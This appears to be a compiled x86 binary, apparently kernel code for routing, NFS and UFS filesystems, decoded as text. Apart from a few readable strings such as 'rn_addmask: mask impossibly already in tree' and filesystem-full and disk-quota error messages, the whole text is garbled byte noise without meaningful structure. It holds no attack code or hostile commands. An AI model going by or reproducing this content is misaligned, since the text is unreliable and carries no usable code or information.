‰V‹SD‰V‹S‹K‰V0‰N4‹S$‹K(‰V‰N‹S,‹K0‰V ‰N$‹S4‹K8‰V(‰N,‹S ‰V@‹S@‰VD‹S<‰VHj
1Àé3/4
hÒ-ðèhVþÿ‹Cƒx8u
1Àë¸

3/4
ƒ{
‹B‹@<‹
ÿ3èÉ*ÿÿƒÄöFtÿKu
ÿsè›*ÿÿƒÄ‹Uüfƒz~1Àë4ÿ3èÍ
ÿÿ‰ÆÿsèÃ
ÿÿ‰ÇjSèQßýÿ‹UüÇB<

PSèU1/4ýÿƒÄÇCL
ÿÿÿöC)uGéÿþÿÿ...Àu>€{,t8j


þÿ‰ÃƒÄ
‹Eà
¸

¸(
u
XþÆ3
ƒÃƒ;

ÿs
èþ×ýÿë¸à(tm)ð...Àu
¸
ûÿÿÉÃU‰å‹E‹PJƒúwmÿ$•¸±ðÜ±ðì±ðì±ð²ð²ðü±ð
²ð²ðì±ð‹@
Ç

j
ÿrèNÌýÿ1ÀÉÃ
ÇEð
ÇEðà(tm)ðƒ}ð
¸
fÿA1ÀéÔ
¸
ÇEÜà(tm)ðƒ}Ü
‹
˜µð‹W]øS‹ŠÿÒƒÄ‹G<¶H
IÁâ)Ê‹}ÿw
Vÿp
‹•œððÿÒ‰EØƒÄ
ÇEølµð‹uè‰uü‹
lµð‹VS‹ÿÒé(r)
ÿuìè
>ÿÿëÿuìèD=ÿÿƒÄƒ}Ø

´ýÿ‰ÃƒÄ
...Û"œ
ÿuVW‹CÿÐeô[^_ÉÃ
‹EƒÀ9Áu
1Àël‰Ï+}G‰}ôŠˆUø‰Mü1öë
¶3/4tBÐAŠÐ<	ví‹}üÆ

û
i €t6ëmþi €t,ëcþi ÀtD
þ
i Àt2ëMþi Àt8þi Àt8ë;‹Uü€z
û
i Àtë"ûi Àtûi Àu‹Uüf¶Jf‰Jë1Àeì[^_ÉÃ
‹EÄe¬[^_ÉÃ0123456789

‹V
ƒÂäë‹V
ƒÂì)òƒú
v
ƒF
òƒF
ëjj
VèÊþÿ‰ÆƒÄ
...ö""
‹
...ötVè*Èþÿ‹EðeÔ[^_ÉÃ
fK



‹uüƒ¦´
Ç†"
Ç†€
u‹W‹
Øfð‰
‹W‰ØfðÿœÈð£
1Àéî
ÇƒÀ
‹Ü^ð‰B£Ü^ðÿà^ð‹(
ˆÿƒ¨
t‹Rëé‹Rëä‰ÐÉÃU‰åVS‹]‹u‹E
fƒx
tŠ"P
t‹@ëá‹@ëÙeø[^ÉÃ
‰þ¶)Â‰UüCAÇEø
t
‹ëé‹ëâƒ
"
8t‹[ë‹[¿C9ÂwáÿuRÿuèáþÿÿ‰Eè‹P‹uð‹F
ŠN
"
8u	‹Mè‰Në
‹Mè‹uð‰N‹uè‰s‹Mð‰N‹F
ŠN
"
8u‰^ë
‹uè‰V‰^‰ÐeÜ[^_ÉÃrn_addmask: mask impossibly already in tree

‰}ð‹...ÿu¸9ßu4‰uÜ‹}‹Mð‰OŠA
ˆG
‹q‰w‰y9Nu‰~ë‰~‰û‹uÜë ‹}‹Uð‹B‰G‰z‰Wƒ




‹J
‹uø¶1...Øt‹uü¶1...Øt‹RëÔ‹RëÎ‹Uð¿r‰uôfƒz

h¢ðèPëýÿ¡äzð@Pÿ5|Dðèp
3/4-
3/4
3/4
3/49
]ØfÿC6ë(]Ø...ÛtCöC9t=ÇEÐ


PS‹@0ÿÐƒÄfƒ{6
h{	ðè\äýÿÿ
Hhðfƒ{6
h
ðèÀãýÿfƒx
hî
ðè àýÿ‰}àöG:t ƒ}
9±Œ
Sè
öÿÿë
‹ƒ"

‹C@fÿH‰s@‹F
‰C<fÿFƒ~

ÿ
ìÕðëƒøu
ÿ
ðÕðë
ƒø
uÿ
ôÕðÿ
øÕð¡
‹A
·
ñ
ë¿
h(c)ðè`Ðýÿ‹]ø‰{‰{ÇC
¸
jÿuüèYýÿ‹MìMðƒ}
¸@
"K
†à%ÿÿ
†à%ÿÿ
†à%ÿÿ
ÇEà
†à·Ð·A)Â‹F†àÁÈ†àÐ†àÁÈ†à‰F‹F†àÁÈ†àÐ†àÁÈ†àé[
†à%ÿÿ
·APS‰ÈƒÀPèýÖ
‹E
ë
‹}€OÿG 1Àeä[^_ÉÃ

ƒ=pÕð

Ç†€





¸


Ç‡€
ƒ}ü





ƒ}
t\ëzƒ¿"



¡ Òð9CXv*‹Mü€yu!€y
¡ Òð9CXt;¡ Òð‰CX‹FÿF9ÔÕð~‹EƒÀPÿuè(r)ýÿÿë€K8‹¨ÕðSXÇF
ÇÄÕð




Öðj
"îGðë‹B0€xt"Hð...Ût&...öt-Sÿ5
ÇG
Ç"Dð
‰È%
R4...Òuïë&¸


¸
‹C9F<u
ÇEà
‹F‰Gë3ƒz
‹CfÿHfÿF‰s‹Fh‰...Àt‹Fh‰X‰^h~h‰{...Ûu1/4ër‹MäÇA

ÇG$
‹CfÿHfÿG‰{‹Gh‰...Àt‹Gh‰X‰_hOh‰K...Ûu1/4ƒ>
9J(t9J u¸
R...ÒuÕ1À‹]üÉÃ
töBu
ÇEô
¸
¸/
¡hÕð‹@<ëƒÿu‹hÕð‹B
ö@t‹BL‰G‹Mƒy
hÕð...ÛtF‹G†àÁÈ†à%
¸0

¡ Òð9BXwEfƒz6
h×lðè(ýÿj

¡(Øð£ Øð¡ Òð£0Øðÿ5 Øðh¶mðj
èÑ€ýÿÇEð
t)Šó<v Šñ<vŠï<v
ÿ
fø†àf‰C
‹V
ƒÂìFƒÄ
9Âs
h+pðèµ|ýÿƒF
ì‹FƒÀ‰F‰F‹M‹A‰F‹^
jSÿuüèa"
†àf‰C
‹C†àÁÈ†à%
‹Mø‹A
ë‹}ø‹G£XØðÿvhTØðèpUÿÿ‰ÂƒÄ...Ò"Ï
¸
hyðè0uýÿ1Ò‰È- ÖðiÀÅNìÄÁøˆ‚|aðBúÿ
ÇÜ^ð
ƒÄf...Àt
ÿtÕðé
€{	."-

u‹C
9Bu‹C9BuŠC	8B	t
‹úãðuÔ1Òf){€cþöC
 t€Kf‹CfÁàf‰CöCuf...Àt)ÿˆÕðRSèt
‰‰
‹A
‰G‹A‰G‰ûéÆ

‹EèHé7
jè=þÿÃ...Ûu
1Àën‹5¨Øðµ
ÿ˜Õðë(ÿ"Õðƒ}ü
¸
‹B
fƒx.t
¸-


‹uÿ6ÿuÌÿuÜÿuà‹Mà‹AdÿÐ‰EÐƒÄé

‹uÜ‹MÀ‰1ƒÆ‰uÀÿ¸ÕðƒÄ‹MèMÔ‹uä·F9EÔŒZþÿÿ‹]Ø]Ä‹Mä·A‰Þ)Æ‰ðPÿuèþÿ‹M‰Yf‹A†à‹uäf‰Ff‹F€Ì †àf‰FfÇF

ƒÄ‹MMÜ...ÉtO‹uÜ‹v‰u‹MÜÇA
þÿƒÄ‹uuÜ...öu³ƒ}Ð
þÿƒÄëœe´[^_ÉÃU‰åƒì
WVS‹E
‹H
‰Mü‹u‹v
‰uø‹@ƒÀü‰Eô·FEô=ÿÿ
Æ

ÇEü*
j
j
ÿ1èlþÿƒÄ‹UÇ
3/4
‹@‹Mä9tC9Ó|è·G9Ã}
ÇEè0
ÇEè1
‹DŸ‰DŸC·G9Ã|ïfÿO‹Mà‰

j
"'
‹B<‰ë¿Ç

j
)þÿƒÄƒ|
öAtƒA‹Q
ÆB
j
"
"9
‰Ç{+~...ÿ~S¿F
9Ç|8ÿ"üð¿F
˜üðÿuè4õýÿƒÄé¢
Rÿsè úýÿƒÄë|Wÿuèúýÿf)~
~ƒÄ‹ÿ¤üð¿F
¨üð‹M‰N9]tI¿F
FÂ+S...Ò~9¿C
9Â| ‹‹S‹J‰M‹B‹
‰A‹‹J‰ÇB
‹MAHŠ^!ƒã‹‹F‰B‹V‹‰ÇF
f‹W
†òf‰W
Pÿuè2
ƒ}Ð†
†òÁÊ†ò‹EØ9u+öG!u%€Mì‹P†òÁÊ†ò‰Uð‹@†àÁÈ†à‰EôÇEØ


‹UÈöBtt‰ÐƒÀTPRèpþÿƒÄ‹EÈƒxT
‹UÈ‹B<+B8‰E¬‹Z4+Z09Ã~‹]¬9Ù[ÿØüð¿G
FHÿ€üð¿
‰}°="üðÿu‹]ÈƒÃ0SèPþÿSÿuÈèïþÿƒÄ‹UÈƒz|




9NDs-‰Ë+^D‰Ø÷ØPÿuèúîýÿf‹FDf‰G
ƒeÌþÿ¬üð°üðƒÄGHF4WVLEÌ¨...*
u
3/4"
˜üðÿÐüðé&	
9Ë
u%‹UÌöÂuƒeÌþ€N-¿_
ÿ"üð˜üðëÿœüð üðSÿuèƒíýÿ_f)_
·G&ƒÄ9Ø~	f)_&ë
ƒeÌßfÇG&

‰Ã_‹FHFD)Ã...ÛŽ
9Ë|a
°üð‹UÌöÂt/fƒ~
u(G+FH...À~-‹FH
ƒeÌöƒÄöEìt!‹G+†ˆ
‹UÈfÇB$6
æ





...Û"m
"


9Âw+‹UÈöBu"ÿuWRè¤

VHŠG!ƒà‰EÌÿ€üð¿
‰}°="üðÿu‹]ÈƒÃ0Sèö
þÿSÿuÈè•
þÿƒÄ‹UÈƒz|

jj
GPÿuWVèî
...
¡PÙðÉÃƒxP
‹u·N‰N\ÇE¤

‰EÀÇE¤

†àÁÈ†à‰ƒÂ¡¸(r)ð†àÁÈ†à‰‹M‹€

‹ufƒ~

‹E¬EÀPÿu´èóë
‹uÿF,€N-‹UÀ‹MQ,‰Q,‹A,‹u+FX...À~‰VXfƒ~f

fƒy



Çôáð(
‹C‰B
‹C‰Bf‹C f‰Bf‹Cf‰BÇB

ƒEü(‹}ü‹M‰y‰yÇA
‹B‰A‹J‹‰ÇB

uj

t¿Cd9üÓð|f¡dÙðf‰Céà
fƒ{~ÿs$è"Žÿÿf‹ClfÁøfCnfÇCl
3/4/
3/4#
uƒ¸"
ÇEø
j
f¡üÓðf‰C‰Ø‹]üÉÃU‰åVS‹E‹u‹]‹M‹Uƒ}
t
¸
Þüÿë¸*
CPÿuè/Ô
"8
"9
‹G‰C
‹G‰Cf‹G f‰Cf‹Gf‰Cf‹C
f‰CfÇC

¿8
¿9
¸


1ÀéÀ	
¸

ë\ƒútëUÿuÿu
ÿuèÎ‹

þÿƒÄë	Sè
þÿƒÄÿ...lÿÿÿ1/2lÿÿÿu93/4€
u)9- 
hððè@÷üÿÇEÌ*ð1/2lÿÿÿ‰}‹WX¡Ì·ð‹JUŒR‹ÿÒƒÄƒø...Žþÿÿ¸



ƒút@ë+ƒúu#1Ûë21/2lÿÿÿ‹WL‰ÑÁù‹u
‰V‰N
ë‹}ÿw8hððèÄöüÿƒÄÿµlÿÿÿè'þÿƒÄ1/2pÿÿÿ
¸
þÿƒÄ...ÀuLÿuj


u9- 

hlðèZ(r)üÿÇlð
hlðèT­üÿÇlð
‹S
‹C‰BVèQþÿjÿvdè§qüÿÇFd
j
ÿrèqüÿ1ÀÉÃ

ƒ8...
‰{8‰_@ëÓ...Û"Ú
u1öƒ?
...lÿÿÿ1/2hÿÿÿ
f
ëN9
‹A£eðë	‹Q
‹A‰B‰Y‹eðúeðt9Z~
‹R
úeðuðúeðu4¡eð‰AÇA
eð=eðeðu	‰
eðë	¡eð‰H
‰
eðë%‹B‰A‰Q
zeðu
‰
eðë‹B‰H
‰J‹]üÉÃ

t
‹uð‹vƒÆ(‰uÔEüPj jj
öAtƒA‹Q
‹AƒÀü


‹V‹F
‰B
~
eðu
‹F£eðë	‹V
‹F‰Bƒ>

ÇCÿÿÿÿë
‹VD†òÁÊ†ò‰S‹V†òÁÊ†ò‰S$‹V†òÁÊ†ò‰S(‹V†òÁÊ†ò‰Sj
ÇC ÿÿÿÿë
‹VD†òÁÊ†ò‰S ‹V†òÁÊ†ò‰S,‹V†òÁÊ†ò‰S0‹V†òÁÊ†ò‰S‹V†òÁÊ†ò‰S‹VL†òÁÊ†ò‰S$‹VH†òÁÊ†ò‰S(‹V$†òÁÊ†ò‰S4‹V(†òÁÊ†ò‰S8‹V,†òÁÊ†ò‰S<‹V0†òÁÊ†ò‰S@‹V4†òÁÊ†ò‰SD‹V8†òÁÊ†ò‰SH‹V@†òÁÊ†ò‰SL‹V<†òÁÊ†ò‰SP‹VT†òÁÊ†ò‰ST‹VP†òÁÊ†ò‰SX‰ø¥8ÿÿÿ[^_ÉÃ

S...Ûu÷E´PE¸PRWj
öCtƒC‹S
‹CƒÀü
‹EƒE ë3...ÄýÿÿPRj EPEPè•ý

hÖ-ðèÐ3/4üÿ‹E 9Cu
‹S
‰-Œ
‹K‹S
‰Q
‹E 9C
u
‹S‰-ˆ
hÝ-ðèÀ1/2üÿ‹E¤9Fu-ÿuÿu
jVèöõÿÿÄ...Àu‹"Ä
öG@"#þÿÿ÷

‹H
‹P‰Qƒþuë
ƒþu
ƒ`0¿ë€H0@ƒ}
‹uƒE ë!EÜPRj EPEPèðõ

‹UƒE ë;•|ÿÿÿRQj URURè)ô
1Àé
‹•dÿÿÿƒÂD‰•dÿÿÿ‹‹•PÚð†òÁÊ†ò‰ƒ>
u
·V
0Ìðë‹
·V
 Ìð†òÁÊ†ò‰S¿V†òÁÊ†ò‰S‹V†òÁÊ†ò‰S
‹V
òÁÊòSxÿ...+
ÇC ÿÿÿÿë
‹VD†òÁÊ†ò‰S ‹V†òÁÊ†ò‰S,‹V†òÁÊ†ò‰S0‹V†òÁÊ†ò‰S‹V†òÁÊ†ò‰S‹VL†òÁÊ†ò‰S$‹VH†òÁÊòS(V$òÁÊòS4V(òÁÊòS8V,òÁÊòS<V0òÁÊòS@V4òÁÊòSDV8òÁÊòSHV@òÁÊòSLV<òÁÊòSPVTòÁÊòSTVPòÁÊòSX...Hÿÿÿ¥8ÿÿÿ[^_ÉÃ

DòÁÊòS ...@ÿÿÿ‹P†òÁÊ†ò‰S,‹P†òÁÊ†ò‰S0‹P†òÁÊ†ò‰S‹P†òÁÊ†ò‰S‹PL†òÁÊ†ò‰S$‹PH†òÁÊ†ò‰S(‹P$†òÁÊ†ò‰S4‹P(†òÁÊ†ò‰S8‹P,†òÁÊ†ò‰S<‹P0†òÁÊ†ò‰S@‹P4†òÁÊ†ò‰SD‹P8†òÁÊ†ò‰SH‹P@†òÁÊ†ò‰SL‹P<†òÁÊ†ò‰SP‹PT†òÁÊ†ò‰ST‹PP†òÁÊ†ò‰SX‹Eƒxxÿ"L
‹]ƒE ë'•4ÿÿÿRQj URURèqâ

ÇCÿÿÿÿë
‹VD†òÁÊ†ò‰S‹V†òÁÊ†ò‰S$‹V†òÁÊ†ò‰S(‹V†òÁÊ†ò‰Sj
ÇC ÿÿÿÿë
‹VD†òÁÊ†ò‰S ‹V†òÁÊ†ò‰S,‹V†òÁÊ†ò‰S0‹V†òÁÊ†ò‰S‹V†òÁÊ†ò‰S‹VL†òÁÊ†ò‰S$‹VH†òÁÊ†ò‰S(‹V$†òÁÊ†ò‰S4‹V(†òÁÊ†ò‰S8‹V,†òÁÊ†ò‰S<‹V0†òÁÊ†ò‰S@‹V4†òÁÊ†ò‰SD‹V8†òÁÊ†ò‰SH‹V@†òÁÊ†ò‰SL‹V<†òÁÊ†ò‰SP‹VT†òÁÊ†ò‰ST‹VP†òÁÊ†ò‰SX‰ø¥èþÿÿ[^_ÉÃ
ë,•\ÿÿÿRQjURURè}Ï

‰ÃƒÄ‹
·B
 Ìð‰Á†éÁÉ†é‰O‹•øþÿÿ¿R†òÁÊ†ò‰W...øþÿÿ‹@†àÁÈ†à‰G
‹•øþÿÿ‹R
†òÁÊ†ò‰WƒÄ‹Exxÿ...§
ÇG ÿÿÿÿëøþÿÿRDòÁÊòW ...øþÿÿ‹@†àÁÈ†à‰G,‹•øþÿÿ‹RòÁÊòW0...øþÿÿ‹@†àÁÈ†à‰GøþÿÿRòÁÊòW...øþÿÿ@LàÁÈàG$øþÿÿRHòÁÊòW(...øþÿÿ‹@$†àÁÈ†àG4øþÿÿR(òÁÊòW8...øþÿÿ@,àÁÈàG<øþÿÿR0òÁÊòW@...øþÿÿ@4àÁÈàGDøþÿÿR8òÁÊòWH...øþÿÿ@@àÁÈàGLøþÿÿR<òÁÊòWP...øþÿÿ@TàÁÈàGTøþÿÿRPòÁÊòWX...üþÿÿ@)...
ÿÿÿ‹
ÿÿÿƒÁ€áü9ÿÿÿu9
ÿÿÿt‰Ê+•
ÿÿÿR‹•ÿÿÿ)ÊRÿµHÿÿÿè	Ð
Ç...þÿÿ
‹]ƒE ë'•LþÿÿRQj URURèU¿
ƒx

ƒù+
ë'ƒù~‹]‹Eƒxxÿt
‰ÚƒÂ,ë‹UƒÂ ‰UëK•4ÿÿÿRQº 
'ÿÿlÿÿÿÄ Ç...
ÿÿÿ4±ðÿÿÿ...hÿÿÿ...ÿÿÿ...|ÿÿÿ...ÿÿÿ...ÿÿÿ...ÿÿÿ¡4±ð‹J•
ÿÿÿR‹ÿÒ...

ƒxÿ"±
ÇC0ÿÿÿÿ...ÿÿÿ‹P,†òÁÊ†ò‰S4ƒx0ÿt ‹H0ºÓMb‰È÷êÁúÁù)Ê†òÁÊ†ò‰S8ë
ÇC8ÿÿÿÿ...ÿÿÿ‹P4†òÁÊ†ò‰S<ƒx8ÿt$‹H8ºÓMb‰È÷êÁúÁù)Ê†òÁÊ†ò‰S@é¯
‹EƒEë0E"PRjEPEPè¬ž
ýÿƒÄ...Û...œ
"
Ç...hÿÿÿ
"
"
Ç...Üþÿÿ
Ç...àþÿÿ
"
ƒú+
ë'ƒú~‹E‹Mƒyxÿt
‰ÂƒÂ,ë‹UƒÂ ‰UëK...ÿÿÿPR¸ 
Ç...Èþÿÿ
‹UƒE ë+•4ÿÿÿRQj URURè5Š
ÿÿÿ‹•(ÿÿÿÇB
ÇC0ÿÿÿÿ...üþÿÿ‹P,†òÁÊ†ò‰S4ƒx0ÿt ‹H0ºÓMb‰È÷êÁúÁù)Ê†òÁÊ†ò‰S8ë
ÇC8ÿÿÿÿ...üþÿÿ‹P4†òÁÊ†ò‰S<ƒx8ÿt$‹H8ºÓMb‰È÷êÁúÁù)Ê†òÁÊ†ò‰S@é
‹EƒEë0E"PRjEPEPèä}
"
‹EƒEë4U1/4RPjURURèôz
Ç... ÿÿÿ
‹`ÿÿÿƒ;
ºd
ÿ
œÈð‹V‹‰Øfð‰=
ÿ
œÈð‹V‹‰Øfð‰=
‹ˆ|ðë‹Tið‰ƒÇ9u¨t91/2dÿÿÿv+~
‰~ë‰ú+U¤VjJÿµLÿÿÿèÓ"ûÿjJÿu"èÉ"ûÿ...4ÿÿÿ¥ÿÿÿ[^_ÉÃU‰åìô

°
·B
 Ìð‰Á†éÁÉ†é‰K‹•Dþÿÿ¿R†òÁÊ†ò‰S...Dþÿÿ‹@†àÁÈ†à‰C
‹•Dþÿÿ‹R
†òÁÊ†ò‰SƒÄ‹Exxÿ...ƒ
ÇC ÿÿÿÿë...Dþÿÿ@DàÁÈàC DþÿÿRòÁÊòS,...Dþÿÿ‹@†àÁÈ†à‰C0‹•Dþÿÿ‹R†òÁÊ†ò‰S...Dþÿÿ@àÁÈàCDþÿÿRLòÁÊòS$...Dþÿÿ@HàÁÈàC(DþÿÿR$òÁÊòS4...Dþÿÿ@(àÁÈàC8DþÿÿR,òÁÊòS<...Dþÿÿ@0àÁÈàC@DþÿÿR4òÁÊòSD...Dþÿÿ@8àÁÈàCHDþÿÿR@òÁÊòSL...Dþÿÿ@<àÁÈàCPDþÿÿRTòÁÊòST...Dþÿÿ@PàÁÈàCX8þÿÿ...<þÿÿT...@þÿÿD|...@þÿÿ,þÿÿ9ÐKúÿÿ91/2dþÿÿ‡_

ÿ
œÈð‹V‹‰Øfð‰
ÿ
œÈð‹V‹‰Øfð‰
‹M‰A8€{...å
‰ð†à‹Møë×SèZ·üÿƒÄ...ÿ..."
‹Mü€aûë(‹MüöAt
fƒy$
"

j

j


¨uöBt
1Éë‹M
fƒ:"À%ÿ




öF$...Ùþÿÿû#tÆ...Û...¤
öF$...qýÿÿû#t²...Ûu
‹Mƒ9
(r)üÿ‹MÇ
‰ÊƒEðë"UìRPjUðRUôRèü7
‹R9\žðtCöFt%ÿuðÿuôÿuøVè9ÿÿÄ...À"
‹S8‰Pë	Ç@@B
ÇG$
‹‹W‰Që	‹W‰Èjð‹O‹‰£
ÇEÈ
‹MäƒEäë"UàRQjUäRUèRèÐ.
Àt
€K$éý
‹G
j
¸

ð‰ð
PSèï­ûÿƒÄþ
öA
"U
‹F‰F
ëN‰N
ÇF
ƒ}"ž
t	þ#...bÿÿÿƒ}Ø
ÇB
‰ÂƒEØ(ë&EÔPRj(EØPEÜPè,
‹UØƒEØë%EÔPRjEØPEÜPè¸

‹‹C‰Bë‹C£Pìð‹S‹‰Ç
ÿÈÏð1öëköCt*ÿÐÏðEøPEüPWj
€cýSèÑ£ûÿ‰ðét
‹‹C‰Bë‹C£Pìð‹S‹‰öCt
ÿsèSˆüÿƒÄöC@"Á
€cýSè[¡ûÿ¸
‹‹A‰Bë‹A£Pìð‹Q‹‰j4Qè±eûÿƒÄÙ...Éu¸ÇÀ"ð
‹<ôÙðë
¿
ÇpÝð
¸
‹u
‹6‰uÐ)N‹Uð)Uƒ}
ƒ}ì
¸
h"*ðèÄÃûÿj
]1/4Ã8]Ð]àM1/4‰Y8f‹]Ü€çf‰Y<‹V†òÁÊ†òf‰Q>‹V
†òÁÊ†ò‰Q@‹V†òÁÊ†ò‰QD‹]Ø‰Y|‹Uì‰Qd‹Uð‰Qh‹Mè‹QR<]1/4‰SHƒ}ä
‹]ÐÇC(ÿÿÿÿ‹MÐÇA@
"
‹	Aƒ9
¸F
‹u Ç

j

j



t	}ìÇ(}ä~}ð...ÿt
‰}àÇEÜ
ÇœÝð
öCtƒC‹K
‹UÐÊ
‹W‰ØfðÿœÈð£
j
‹‹A‰Bë‹A‰C
‹Q‹‰j3Qè/ûÿƒÄñ...Éuºeô[^_ÉÃnfsauth1
‹‹A‰Bë‹A£8éð‹Q‹‰j2Qè}-ûÿÉÃ
h¶>ðèäœûÿ€
´_ðƒ}
‹‹C‰Bë‹C£8éð‹S‹‰j2Sè-ûÿƒÄó...ÛuÀèÇÿÿÇ4éð
ƒú
ëƒú~‹Uìƒ}à


Ç Òð

¸
öC0 "$
¸
Çƒ˜
ƒc0÷‹‹¬
ƒÿ"ö
1Àé
ƒÂ,‰Pë
ƒÂ ‹uÀ‰Vƒ}Ü
‹MðƒEðë!UèRQjUðRUôRèL¹ÿÿ‰ÃƒÄ...ÛuF‹Mè‹†òÁÊ†ò‰Uä‹I†éÁÉ†é‰Mà‹EÐ9À
u91/4



öA0"jÿÿÿ‹•hÿÿÿÇ‚°
f1/2Xÿÿÿ
Ç...4ÿÿÿ-
f1/2Xÿÿÿ
‹EðƒEðë!EìPRjEðPEôPèðªÿÿ‰ÃƒÄ...ÛuA‹Eì‹
(tm)ÿÿ‰Ç‰}ÌƒÄöGt‹WW$‹O
O)Êƒú~ é·
‹MìƒEìë$UäRQjÿuÈÿuÄèŽ¢ÿÿ‰EÀƒÄ...À...Püÿÿ‹Mä‹†òÁÊ†ò‰Uà‹I†éÁÉ†é‰MÜ‹]Ô9"À
u91/4
/
ÇAÿÿÿÿG,àÁÈàA0ÿt201/2@ÿÿÿ¸ÓMb÷ï‰ÓÁû‰Dÿÿÿ‰øÁøÚ)ÂòÁÊòQë	ÇAÿÿÿÿ...lÿÿÿPpÿÿÿR...tÿÿÿP‹•Xÿÿÿÿr
ÿrj	ÿµLÿÿÿÿµ\ÿÿÿèeÿÿÃÄ ...Û...ì
ø‰Ú)Â†òÁÊ†ò‰Që	ÇAÿÿÿÿ...\ÿÿÿ@,àÁÈàA\ÿÿÿz0ÿt:B0...Lÿÿÿ¸ÓMb÷­Lÿÿÿ‰ÓÁûPÿÿÿ...LÿÿÿÁøÚ)ÂòÁÊòQë	ÇAÿÿÿÿ...pÿÿÿP...tÿÿÿP...xÿÿÿPÿw
ÿwj	ÿµTÿÿÿÿµ`ÿÿÿè÷\ÿÿÃÄ ...Û...ò
¸
ÿµpÿÿÿè%ÿÿ...hÿÿÿ‰E"ƒÄö@t‹hÿÿÿ‹AA$‹Q
Q)Ðƒø~$é°
ÿµhÿÿÿÿµpÿÿÿèÁWÿÿ‰ÃƒÄ ...Ûu
ÿu€èTüÿƒÄj
ÿwèÇáúÿ‹pÿÿÿ‹Ad€H0‹AdÇ€˜
ÿqè1/4{ÿÿ‰Ç‰}øƒÄöGt‹GG$‹W
W)Ðƒø~%é±
WÿqèfTÿÿÃÄ ...Ûuÿuôèùýûÿ‹M‹A‹@d€H0‹A‹@dÇ€˜
Qè<§üÿë
ÿuÜèü¦üÿƒÄƒ}ä
ðh€

C
òQ...Tÿÿÿƒx(ÿt6‹P(‰•,ÿÿÿ¸ÓMb÷ê‰ÓÁû<ÿÿÿ...,ÿÿÿÁø‰Ú)Â†òÁÊ†ò‰Që	ÇAÿÿÿÿ...Tÿÿÿ@,àÁÈàATÿÿÿz0ÿt:B0...8ÿÿÿ¸ÓMb÷­8ÿÿÿ‰ÓÁû<ÿÿÿ...8ÿÿÿÁøÚ)ÂòÁÊòQë	ÇAÿÿÿÿ...pÿÿÿPtÿÿÿR...xÿÿÿP‹•Pÿÿÿÿr
ÿrj
WÿµXÿÿÿèÎ4ÿÿÃÄ ...Û...Ì
t‹PP$‹H
H‰Èë‹Eø‹H
H‰ÈƒÀ€‹Uø)Â9ÖŽ¢
ƒ~

¿H
Ç...lÿÿÿ
Ç...lÿÿÿ
Ç...hÿÿÿ
Ç...Tÿÿÿ
ð...EàtèQØ
¸

%s: write failed, file system is full





hZéðè8ûÿ‹]+]‰ÚÁê	-è


%s: create/symlink failed, no inodes free

¡ Òð£xÒð¡xÒð‰ƒì
‹Mƒ|ü
‰ðF`Eè¶
‰ðF`Eè¶
‰ðF`ø‰Ç‹UôÚ‰Uè‹EèyƒÀ
$ø‹Mè)Á‰ÈºþÿÿÿÓÂ‰Ð 
ÿN$‹Møÿ‰Ì
‰ðF`Eà‰Eì‹MÙ‰Mà‹EàyƒÀ
$ø‹Uà)Â‰Ðº
‰ðF`Eà‰Eè‹UøÚ‰Uà‹EàyƒÀ
$ø‹Mà)Á‰ÈºþÿÿÿÓÂ‰Ð‹Mè C9]ô¤‹Uô)V$)-Ì

‰ÁÁØ
‹Eü‹U
‰B(‹N`‹]üÓûS‹U
zU	
‰ÑÁØ
Të‹]
[TËÿ
Æ†Ð
h£ðè´êúÿw89uØÿuüèìûûÿ‹Eôë
ÿuüèÜûûÿ1ÀeÜ[^_ÉÃcg = %d, irotor = %ld, fs = %s


"
Ô
‰ØC\È3/4
èúÿs0ð...ö}F
‰ÁÁù{U	
"
Ô



‰ÚS`‰UÜÿuÜWè;&

´3Ø

uð...ö}ƒÆ
Áþ‰uÜ{U	



"Ø
ÿ‰}äë¶
‰MìCÇEä

fÜþÿÿée
¸
Ç...(ÿÿÿ
Ç...(ÿÿÿ
Ç‡è
Eà(tm)÷}Ü‰Eà‹Uð‹R0Áê	‰UØj


¸
¸
jÿuÀè‹
Ç€P

ƒ{0
hlðèvúÿÇlð
¡ Òð£xÒð‹=xÒð‹EÐ‰¸ì
¸F
‹MìI
‹}ìgÿûÿÿƒ}Ô
ëtƒútëm‹uÀ÷Æ
ƒ{L
hÃOðèžúÿ9{Xu	‹uƒ~
tZSèø(c)ûÿ‹S$€Ê‰S$ƒÄ‹uØ‰5
Í
|Êé
}*‹F@‹L¸ü‹UÈJ(9
¸uG‹Uÿ‹MÈ9y v
‹M¸9
|ÙƒEÀ
ÿMØ...Èþÿÿ...ötVè
"ûÿUÈB$ÁÓe1/4M1/4‹U‰
...ÉuÇÿÿÿÿ1Àe [^_ÉÃ

Ç€´


Ç´
ƒÂ9Ârö·ÁÉÃ

ÇA4ÿÿÿÿ€IÉÃ
fƒøt
ë"fƒøtë¸-

u+9-ˆ
ƒ}"...+
uq9-ˆ
¸



u%9-ˆ
hgrðèôwúÿfµpþÿÿfµüþÿÿ1/2lþÿÿf‰_ß1/2lþÿÿÿµtþÿÿÿµlþÿÿ•øþÿÿRè
uj9-ˆ

%s: write failed, %s disk limit reached

%s: warning, %s %s

%s: write failed, %s %s

%s: write failed, %s inode limit reached

üÿ‰E¨ƒÄ
...À...›
ÌûÿƒÄéõ
‹@8‹U‰D-,‹E¬ƒx<
‹@<‹U‰D-4ÿu¬j
1ÀéÈ
‹M
aÿßÿÿ‰Øeì[^_ÉÃ
PVèP
‹}öD7<t‹uÇ
‹S
‰Q
ë
‹S
‰1/4ìð‹S
‰
fÿC‹}‰é
Ç1/4ìð€ið‰
€iðÇC
‹u°9ut-ÇEØlµð‰uÜ¡lµð‹NUØR‹ÿÒƒÄ}´...Ét‰Y‰
‹u´‰s‰-fÿCfÇC
Ç
ƒ{ 
1Àé\
Vè=)úÿƒÄöFu(9]t'ÇEØ˜µð‰]Ü¡˜µð‹KUØR‹ÿÒéqÿÿÿöFu¶€N}Ð‰}àÇEä
Ç

ƒøu	¸
‰˜
ÇC 
ÇC 
‹V‹R$‰S ‹è
ƒ~ÿ"€
ƒùtë$ƒùtë¸
ƒ~,ÿ"

¸-
¸O
Wèøµûÿë
ÿuüè¸µûÿƒÄWè¯µûÿ‰ðeð[^_ÉÃ
h(ðèÜQúÿ1/2|ÿÿÿÇ

èQ(c)ûÿƒÄÿvèF(c)ûÿƒÄ‹UØÇEÜlµð‰Uà¡lµð‹JUÜR‹ÿÒƒÄ...Àu"1/2xÿÿÿfÿ‚
¥ûÿ‰ðeÈ[^_ÉÃU‰åƒìWVS‹]‹{ÿs
Wÿs‹Sf‹R€Î ·ÒRè+

j
ÿrè(r)Ñùÿ1ÀÉÃufslk1

ÇBT

úÿ1ÀÉÃ


°ðè@@úÿ1Àeø[^ÉÃ
